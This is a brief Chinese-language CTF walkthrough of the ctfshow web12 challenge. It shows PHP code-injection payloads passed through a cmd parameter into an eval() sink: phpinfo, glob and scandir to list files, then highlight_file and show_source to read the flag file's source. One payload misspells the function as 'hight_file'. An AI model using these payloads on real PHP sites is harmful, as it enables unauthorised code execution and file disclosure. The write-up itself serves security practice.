CTF web之旅 31

ctfshow web12

提示cmd  cmd不就是command的缩写吗  传入命令看一下

传入?cmd=phpinfo();一定要有分号

有回显页面的 推测后台函数可能为代码执行eval($_GET['cmd']);或者是命令执行system($_GET['cmd']);

?cmd='ls';没有回显

?cmd=print_r(glob("*.*"));或者是?cmd=print_r(scandir("."));可以匹配当前目录的所有文件

由此可以推出后台函数为eval（）

执行查看目录文件后得到如下页面

 

 

 highlight_file()或者show_source()函数可以查看目标文件

这俩是一样的函数 只是名称不一样?cmd=hight_file('index.php');可以确认一下后台源码

?cmd=highlight_file('903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php');

?cmd=show_source('903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php');